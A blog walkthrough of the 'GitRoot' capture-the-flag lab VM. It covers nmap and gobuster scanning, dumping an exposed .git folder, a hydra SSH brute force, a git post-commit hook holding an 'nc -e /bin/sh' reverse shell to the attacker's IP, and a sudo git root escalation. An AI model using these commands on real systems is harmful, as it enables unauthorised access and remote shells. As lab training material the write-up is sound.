GitRoot Walkthrough

Start by scanning the host with nmap -A -T4 -p- 192.168.1.5 -vv

Visiting the page we can see there is a massage where we going to add the link http://wp.gitroot.vuln/ to our hosts file:

After we add the site to our file /etc/hosts, we can see it’s a WordPress site and we can scan it with Dirb:

We going to scan for users using wpscan –url http://wp.gitroot.vuln -e u

After brute forcing for a while it came to nothing, so i went back for brute forcing directory and i used dirsearch and gobuster and finally came with a result, at fist i tried:

gobuster vhost –url http://wp.gitroot.vuln/ -w /usr/share/dirb/wordlists/big.txt but came with nothing then i tried:

gobuster vhost –url http://gitroot.vuln/ -w /usr/share/dirb/wordlists/common.txt and changing the hosts file

I found a lot of directories and files then this one came with a page repo.gitroot.vuln

Then we use gobuster dir –url http://repo.gitroot.vuln -w /usr/share/dirb/wordlists/common.txt:

Now we use a very cool tool to download the Git directory to our machine, using this TOOL and then we run it:

./gitdumper.sh http://repo.gitroot.vuln/.git/ /root/

Looking inside the directories i found few files and the name Pablo as a root, also a new file with long name:

None of them passwords worked in WordPress or ssh, so i decided to use the name Pablo and brute force the ssh service that we have it open:

hydra -l pablo -P /root/pass/rockyou.txt ssh://192.168.1.5 -f -vV

It took too long but finally got it, now we use the password we found with the user Pablo to login, after logging in we found the user.txt file:

Also, there is a folder Public where we can find a new text file with massage:

Now running the tool LinEnum.sh didn’t return much, but running another tool PEASS got some good information especially this tool got a way to scan for Git stuff like names and folders:

Now we go to /opt/auth/.git/config where the configuration files are located, navigating inside to the /opt/auth/.git/logs/refs/heads folder where we can find a lot of files but just one of them is different in size:

We vide it and there are some commits inside viewing till we get this one:

We got the username which is beth and now we got the password which is r3vpdmspqdb so let’s login:

A new message for Beth in here Public folder saying:

Hello Beth

If you want to commit to my repository you can add a zip file to ~jen/public/repos/ and ill unzip it and add it to my repository

Thanks!

Now it’s time to use this amazing SITE:

git init

echo ‘nc -e /bin/sh 192.168.1.11 4444’ > ‘/tmp/.git/hooks/post-commit’

chmod +x /tmp/.git/hooks/post-commit

7z a shell.zip .git

chmod +x shell.zip

cp shell.zip /home/jen/public/repos/shell.zip

And on our machine we start a listening port 4444 and wait to get a reverse shell:

in the directory there is a file .viminfo when we view it we find a weird text or word, i used it as sudo -l and it worked:

Now back to this SITE we can run Git with simple steps and become root:

After we press ENTER we write !/bin/sh and then we get root shell

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s